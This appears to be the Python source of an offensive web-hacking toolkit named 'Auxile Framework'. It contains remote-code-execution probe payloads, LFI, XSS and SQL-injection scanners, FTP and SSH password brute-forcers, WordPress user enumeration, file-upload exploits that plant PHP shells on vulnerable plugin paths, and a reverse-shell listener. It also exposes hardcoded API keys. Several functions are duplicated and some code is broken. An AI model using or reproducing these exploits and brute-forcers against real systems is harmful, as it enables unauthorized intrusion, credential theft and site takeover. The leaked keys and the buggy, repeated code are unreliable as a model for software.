def domage(t):
r = requests.get('https://input.payapi.io/v1/api/fraud/domain/age/' + t)
a = json.loads(r.text)
try:
printf('%s'%a['message'])
except KeyError:
printf('incorrect Input')
def rcevuln(web):
if 'http' not in web:
try:
urllib.urlopen('http://' + web)
url = 'http://' + web
except:
url = 'https://' + web
else:
url = web
if '?' in url:
printf("[+] Scanning for Remote Code/Command Execution ")
payloads = [';${@print(md5(rce))}', ';${@print(md5("rce"))}']
payloads += [
'%253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B'
]
payloads += [
';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();',
';phpinfo'
]
check = re.compile(
"51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot",
re.I)
main(url, payloads, check)
else:
printf('[!] no parameters found')
def tests_pyver():
if sys.version[:3] == "2.7" or "2" in sys.version[:3]:
pass
elif "3" in sys.version[:3]:
printf("\r[i] Auxile has no support for Python 3.x")
else:
printf("\r[w] Your Python version is very old ..")
def help_menu(name):
if name in webkit_dict or name in [
'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip',
'honeypot'
]:
hell(' -u <hostname>\t\thostname or domain name', name)
elif name in encdec_array:
hell(' -e, --enc\t\tencode string\n -d, --dec\t\tdecode string',
name)
elif name in ['adfin', 'upload', 'shell', 'dirscan', 'wpscan', 'user_pro']:
hell(' -u <url>\t\twebsite target to scanning', name)
elif name == 'nmap':
hell(' -u\t\t\thostname or domain name\n -t\t\t\ttype to scanning',
name)
elif name in hash_array:
hell(' -s <string>\t\tstring to hashing', name)
elif name == 'dork':
printf(
'Usage: %s [arguments]\n\npositional arguments:\n string\t\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s\t\t\tscan sql error'
% name)
elif name == 'wp_user':
hell(
' -u <url>\t\twebsite target to scanning\n -n <num>\t\tnumber of users',
name)
else:
printf('%s: not found' % name, 2)
def cms(t):
r = requests.get('https://whatcms.org/APIEndpoint?key=745aaac9fc2d1acc0e20330469b1db3979be347b5542b3b5b790b42d10cb68cac78c2f&url=' + t)
a = json.loads(r.text)
if a['result']['msg'] == 'Success':
for i in a['result']:
printf('%s: %s'%(str(i),str(a['result'][i])))
else:
printf('%s'%str(a['result']['msg']))
def honey(ip):
honey = "https://api.shodan.io/labs/honeyscore/" + ip + "?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by"
try:
phoney = urlopen(honey).read().decode('utf-8')
except URLError:
phoney = None
printf('No information available for that IP!')
if phoney:
print('Honeypot Probabilty: {probability}'.format(probability=float(phoney) * 10))
def lfiscan(web):
url = parse(web)
printf('[+] wait a minute, scanning (%s)' % url)
lfis = open('core/wordlist/lfi.txt', 'r').readlines()
for lfi in lfis:
check = requests.get(url + lfi.strip()).text
if re.findall("root:x", check):
printf(' %s' % web + lfi.strip())
break
def start(web, path):
for i in path:
i = i.strip()
r = requests.get(web + i)
if r.status_code == 200:
code = '\033[92m%s\033[0m' % r.status_code
else:
code = '\033[91m%s\033[0m' % r.status_code
printf('%s [%s]' % (r.url, code))
def hash(name,msg):
if name == 'rev':
print('Reverse string: ' + msg[::-1])
elif name == 'rot13':
print('Rot13: ' + msg[2:].encode('rot13'))
elif name in ['md4','md5','sha1','sha224','sha256','sha384','sha512','ripemd160','whirlpool']:
m = hashlib.new(name)
m.update(msg.encode('utf'))
printf(name + ': ' + m.hexdigest())
def start(web, path):
printf('[+] wait a minute, scanning (%s)' % web)
for i in path:
i = i.strip()
r = requests.get(web + i)
if r.status_code == 200:
code = '\033[92m%s\033[0m' % r.status_code
else:
code = '\033[91m%s\033[0m' % r.status_code
printf('%s [%s]' % (web + i, code))
def vtem_ex(web, file):
files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')}
url = parse(web)
printf('[+] vtem slide show - file uploaded.')
printf('[+] start uploading files (%s) to (%s)' % (file, url))
requests.post(url + "/modules/vtemslideshow/uploadimage.php", files=files)
cek = requests.get(url + '/modules/vtemslideshow/slides/' + file)
if cek.status_code == 200:
printf('[+] Files successfully uploaded')
printf(' => link: %s' % cek.url)
else:
printf('[!] Failed to upload files, maybe website is not vulnerable!')
def hpa_ex(web,file):
url = parse(web)
printf('[+] Home Page Advertise Exploit')
printf('[+] start uploading files (%s)' % file)
files = {'userfile':(file, open(file,'rb'),'multipart/form-data')}
requests.post(url + "/modules/homepageadvertise/uploadimage.php",files=files)
cek = requests.get(url + "/modules/homepageadvertise/slides/" + self.file)
if cek.status_code == 200:
printf('[+] Files successfully uploaded')
printf(' => link: %s' % cek.url)
else:
printf('[!] Failed to upload files, maybe website is not vulnerable!')
def sss_ex(web,file):
url = parse(web)
printf('[+] Simple Slide Show exploit')
printf('[+] start uploading files (%s)' % file)
files={'userfile':(file, open(file,'rb'),'multipart/form-data')}
requests.post(url + "/modules/simpleslideshow/uploadimage.php",files=files)
cek = requests.get(url + '/modules/simpleslideshow/slides/' + file)
if cek.status_code == 200:
printf('[+] Files successfully uploaded')
printf(' => link: %s' % cek.url)
else:
printf('[!] Failed to upload files, maybe website is not vulnerable')
def subdo(t):
subdomains = []
req = requests.get("https://crt.sh/?q=%.{d}&output=json".format(d=t))
if req.status_code == 200 and req.text != '':
json_data = json.loads('[{}]'.format(req.text.replace('}{', '},{')))
for (key,value) in enumerate(json_data):
subdomains.append(value['name_value'])
sub = sorted(set(subdomains))
for subdomain in sub:
printf('%s'%subdomain)
else:
printf("Information not available!")
def as_ex(web, file):
url = parse(web)
files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')}
printf('[+] Addvanced slider - file uploaded.')
printf('[+] start uploading files (%s) to (%s)' % (file, url))
requests.post(url + "/modules/advancedslider/file_upload.php", files=files)
cek = requests.get(url + '/modules/advancedslider/slides/' + file)
if cek.status_code == 200:
printf('[+] Files successfully uploaded')
printf(' => link: %s' % cek.url)
else:
printf('[!] Failed to upload files, maybe website is not vulnerable')
def email_to_domain(email):
cek(email)
url = "https://whoisology.com/search_ajax/search?action=email&value="+email+"&page=1§ion=admin"
output = requests.get(url).content
regex = re.compile('whoisology\.com\/(.*?)">')
finded = regex.findall(output)
if len(finded) > 0:
for i in finded:
if i.strip() != "":
if '.' in i.strip():
printf('*? %s' % i.strip())
else:
printf('[!] Empty domain result for email: %s' % email)
def user_scan(url, usern):
results = []
if 'http' not in url:
try:
urllib2.urlopen('https://' + url)
site = 'https://' + url
except:
site = 'http://' + url
else:
site = url
printf('scanning (%s)' % site)
for x in range(0, int(usern)):
print('\rprogress %s' % (100 / int(usern) * x) + '%'),
sys.stdout.flush()
try:
tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)}))
if tmp == False:
continue
tmp = find_user(tmp)
except:
pass
if len(tmp['user']):
results.append(tmp)
max_login_len = len(tmp['user']) if max_login_len < len(
tmp['user']) else max_login_len
max_name_len = len(tmp['name']) if max_name_len < len(
tmp['name']) else max_name_len
if not results:
printf('\nCould not find anything, maybe not vulnerable!')
return
results = sort_and_deduplicate(results)
print("\nFound " + str(len(results)) + " users in " + site + "")
login_space = (max_login_len - len("Login") + 1) * " "
name_space = (max_name_len - len("Name") + 1) * " "
login_bar = ((max_login_len - len("Login") + 1) + 6) * "-"
name_bar = ((max_name_len - len("Name") + 1) + 5) * "-"
header = "| Id | Login" + login_space + "| Name" + name_space + "|"
print(" +----+" + login_bar + "+" + name_bar + "+")
print(" " + header)
print(" +----+" + login_bar + "+" + name_bar + "+")
for x in range(0, len(results)):
id_space = (3 - len(str(x + 1))) * " "
login_space = (max_login_len - len(results[x]['user']) + 1) * " "
name_space = (max_name_len - len(results[x]['name']) + 1) * " "
print(" | " + str(x + 1) + id_space + "| " + results[x]['user'] +
login_space + "| " + results[x]['name'] + name_space + "|")
print(" +----+" + login_bar + "+" + name_bar + "+")
def ftp(hostname, username, wordlist):
words = open(wordlist, 'r').readlines()
printf('[+] Starting attack ! (%s)' % hostname)
for i in words:
try:
ftp = FTP(hostname)
login = ftp.login(username, i.strip())
if "230" in login:
printf('[+] login success !!')
printf('[+] username : %s' % username)
printf('[+] password : %s' % i.strip())
except:
pass
printf('[w] Not found!')
def ssh(hostname, username, wordlist):
words = open(wordlist, 'r').readlines()
printf('[+] Starting attack ! (%s)' % hostname)
for i in words:
try:
s = pxssh.pxssh()
login = s.login(hostname, username, i.strip())
if login == True:
printf('[+] login success !!')
printf('[+] username : %s' % username)
printf('[+] password : %s' % i.strip())
except:
pass
printf('[w] Not found!')
def dorking(string, sqlscan=None):
debby = 0
urls = []
printf('[+] Searching..')
for i in range(1, 10):
payload = {'q': string, 'start': i}
headers = {'User-agent': 'Mozilla/11.0'}
req = requests.get('http://www.google.com/search',
payload,
headers=headers)
soup = BeautifulSoup(req.text, 'html.parser')
h3tags = soup.find_all('h3', class_='r')
for h3 in h3tags:
try:
urls.append(
re.search('url\?q=(.+?)\&sa',
h3.a['href']).group(1).replace('%3F',
'?').replace(
'%3D', '='))
except:
continue
payload = {'q': string, 'first': i}
headers = {'User-agent': 'Mozilla/11.0'}
req = requests.get('https://www.bing.com/search',
payload,
headers=headers)
soup = BeautifulSoup(req.text, 'html.parser')
h3tags = soup.find_all('li', class_='b_algo')
for h3 in h3tags:
try:
urls.append(
h3.find('a').attrs['href'].replace('%3F', '?').replace(
'%3D', '='))
except:
continue
urls = sorted(set(urls))
if len(urls) == 0:
printf('[!] no url found')
elif sqlscan == None:
for i in urls:
printf(' %s' % i)
else:
for url in urls:
source = requests.get(url + "'").text
for type, eMSG in errors.items():
if re.search(eMSG, source):
printf(' %s [\033[92m%s\033[0m]' % (url, type))
debby += 1
if debby == 0:
printf('[!] no url found')
def listener_(host,port):
printf('[+] Listening on port %s' % port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,int(port)))
s.listen(5)
c,_ = s.accept()
printf('[+] Session opened, ip: %s port %s' % (_[0],_[1]))
while True:
an = raw_input('Auxile (\033[93mmeterpreter\033[0m) _> ')
cmd = an.replace(':','').split()
if not cmd:
pass
else:
c.send(cmd)
c.recv(10000)
def help_menu(name):
if name in webkit_dict or name in [
'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip',
'honeypot'
]:
hell(' -u HOSTNAME\thostname or domain name\n', name, '-u HOSTNAME')
elif name in encdec_array:
hell(' -e, --enc\tencode strings\n -d, --dec\tdecode strings\n',
name, '( --enc | --dec )')
elif name in finder_array:
hell(' -u URL\ttarget website\n', name, '-u URL')
elif name == 'nmap':
hell(
' -u HOSTNAME\thostname or domain name\n -t TYPE\ttype to be scanned\n',
name,
'-t ( all-cve | sqli-scan | wordpress | heartbleed | ssh-brute | csrf | webdav-scan | smtp-brute ) -u <target>'
)
elif name in hash_array:
hell(' -s STRING\tthe word will be changed to hash\n', name,
'-s STRING')
elif name == 'dork':
printf(
'\n[u] %s [-s] STRING\n\npositional arguments:\n string\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s, --scan\tscan sqli vulnerability\n'
% name)
elif name == 'wp_user':
hell(' -u URL\ttarget website\n -n NUM\tnumber of users\n', name,
'-u URL')
elif name in exp:
hell(
' -u URL\ttarget website\n -f FILE\tfile that will be uploaded\n',
name, '-u URL -f FILE')
elif name == 'default_pass':
hell(' -m MANUFACTOR\tPassword string\n', name, '-m MANUFACTOR')
elif name == 'hackedmail_check':
hell(' -e EMAIL\tYour email will be checked\n', name, '-e EMAIL')
elif name == 'wordpress_brute':
hell(
' -s URL\ttarget website\n -u USERNAME\tusername of Wordpress\n -w WORDLIST\twordlist for attack target\n',
name, '-s URL -u USERNAME -w WORDLIST')
elif name in ['ssh_brute', 'ftp_brute']:
xs = name.split('_')[0]
hell(
' -i HOSTNAME\tip address of {xs} server\n -u USERNAME\tusername of {xs} server\n -w WORDLIST\twordlist path\n'
.format(xs=xs), name, '-i HOSTNAME -u USERNAME -w WORDLIST')
else:
printf('%s: not found' % name, 2)
def help_menu(name):
if name in webkit_dict or name in ['mxrecords','domain_age','whatcms','subdomain','geoip','honeypot']:
hell(' -u <hostname>\thostname or domain name\n',name)
elif name in encdec_array:
hell(' -e, --enc\tencode strings\n -d, --dec\tdecode strings\n',name)
elif name in finder_array:
hell(' -u <url>\ttarget website\n',name)
elif name == 'nmap':
hell(' -u\t\thostname or domain name\n -t\t\ttype to be scanned\n',name)
elif name in hash_array:
hell(' -s <string>\tthe word will be changed to hash\n',name)
elif name == 'dork':
printf('\nUsage: %s [arguments]\n\npositional arguments:\n string\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s\t\tscan sqli vulnerability\n' % name)
elif name == 'wp_user':
hell(' -u <url>\ttarget website\n -n <num>\tnumber of users\n',name)
elif name in exp:
hell(' -u <url>\ttarget website\n -f <file>\tfile that will be uploaded\n',name)
else:
printf('%s: not found' % name,2)
def check_vuln(url):
plug = "/wp-content/plugins/userpro/css/userpro.min.css"
vuln = "/?up_auto_log=true"
if 'http' not in url:
try:
urlopen('https://' + url)
url = 'https://' + url
except:
url = 'http://' + url
printf('[+] check plugins (%s)' % url)
pURL = urlopen(url + plug).read()
if pURL.find(".userpro") > -1:
printf('[+] Plugin is installed. checking vulnerable..')
pURL = urlopen(url + vuln).read()
if pURL.find("admin-bar-css") > -1 or urlopen(
url + 'wp-admin').read().find('admin-bar-css') > -1:
printf('[+] this website is vulnerable..')
else:
printf('[!] this website isn\'t vulnerable..')
else:
printf('[!] Plugin isn\'t installed')
def banner():
try:
sys.stdout.write("\x1b]2;Auxile Framework - @CiKu370\x07")
for i in range(random.randrange(1,2)):loading("Loading the fingerprinting framework..")
tests_pyver()
tests_platform()
printf('''\r[w] If you don't know how run it use help !\033[92m
▄████████ ███ █▄ ▀████ ▐████▀ ▄█ ▄█ ▄████████
███ ███ ███ ███ ███▌ ████▀ ███ ███ ███ ███
███ ███ ███ ███ ███ ▐███ ███▌ ███ ███ █▀
███ ███ ███ ███ ▀███▄███▀ ███▌ ███ ▄███▄▄▄
▀███████████ ███ ███ ████▀██▄ ███▌ ███ ▀▀███▀▀▀
███ ███ ███ ███ ▐███ ▀███ ███ ███ ███ █▄
███ ███ ███ ███ ▄███ ███▄ ███ ███▌ ▄ ███ ███
███ █▀ ████████▀ ████ ███▄ █▀ █████▄▄██ ██████████\033[0m
Coded by @CiKu370
''')
except KeyboardInterrupt:
print('\n\033[91mERROR\033[0m: Interrupt..')
exit()
def user_scan(url, usern):
results = []
if 'http' not in url:
try:
urllib2.urlopen('https://' + url)
site = 'https://' + url
except:
site = 'http://' + url
else:
site = url
printf('[+] wait a minute, scanning (%s)' % site)
for x in range(0, int(usern)):
try:
tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)}))
if tmp == False:
continue
tmp = find_user(tmp)
except:
pass
if len(tmp['user']):
results.append(tmp)
if not results:
printf('[!] Could not find anything, maybe not vulnerable!')
return
results = sort_and_deduplicate(results)
print("[+] Found " + str(len(results)) + " users in " + site + "")
for i in range(0, len(results)):
printf(' user: %s\n name: %s' %
(results[i]['user'], results[i]['name']))
def default_pass(manufactor):
x = {}
search_link = "http://www.defaultpassword.com/?action=dpl&char=" + manufactor
printf('[+] Searching for passwords.')
req = requests.get(search_link)
html = req.content
result = html.split('<TR VALIGN="top">')
try:
result.pop(0)
result.pop(0)
for line in result:
spliting = line.split('<TD NOWRAP>')
string = ''
for element in spliting:
if "</TD>" in element and element.strip() != '':
manufactor = spliting[1].split('</TD>')[0]
product = spliting[2].split('</TD>')[0]
protocol = spliting[4].split('</TD>')[0]
user = spliting[5].split('</TD>')[0]
password = spliting[6].split('</TD>')[0]
printf(
'[+] Manufactor: %s\n[+] Product: %s\n[+] Protocol: %s\n[+] User: %s\n[+] Password: %s'
% (manufactor, product, protocol, user, password))
except IndexError:
printf('[w] No results were found for this manufacturer.')
def xss(web):
vuln = 0
payloads = open('core/wordlist/xss.txt')
if 'http' not in web:
try:
requests.get('http://' + web)
url = 'http://' + web
except:
url = 'https://' + web
else:
url = web
if '=' in url:
printtf('[+] Scanning (%s)' % url)
r = requests.get(url)
content = r.text
for payload in payloads:
if payload.strip().lower() in content.lower():
print(" XSS Vulnerable: " + url + payload)
vuln += 1
if len(vuln) == 0:
print "[!] Not vulnerable!"
else:
printf('[!] No parameter found!')
def upload(web):
payloads = {}
path = open('core/wordlist/upload.txt', 'r').readlines()
url = parse(web)
printf('[+] scanning (%s)' % url)
for i in path:
x = i.strip().split(':')
try:
payloads.update({x[0]: x[1]})
except IndexError:
pass
for i in payloads:
r = requests.get(url + '/' + payloads[i])
if r.status_code == 200:
printf(' %s [\033[92mVuln\033[0m]' % i)
printf(' => link: %s' % r.url)
else:
printf(' %s [\033[91mNot Vuln\033[0m]' % i)
def exploit_wp(url, file):
if 'http' not in url:
try:
urllib2.urlopen('http://' + url)
site = 'http://' + url
except:
site = 'https://' + url
else:
site = url
printf('[+] create random directory and shell..')
if not os.path.isfile(file) and not os.access(file, os.R_OK):
printf('[!] file is missing or not readable', 2)
return
socket.setdefaulttimeout(10)
url_upload = site + '/wp-content/plugins/wp-symposium/server/php/'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
rand_dirname = id_gen()
rand_shellname = id_gen()
body = create(file, rand_dirname, rand_shellname, url_upload)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(body))
}
printf('[+] start upload %s to %s' % (file, site))
req = urllib2.Request(url_upload + 'index.php', body, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0" or read == "":
printf('[!] upload failed, maybe site isn\'t vulnerable!')
else:
printf('[+] success uploaded')
printf('[+] location %s' % url_upload + rand_dirname + rand_shellname +
'.php')
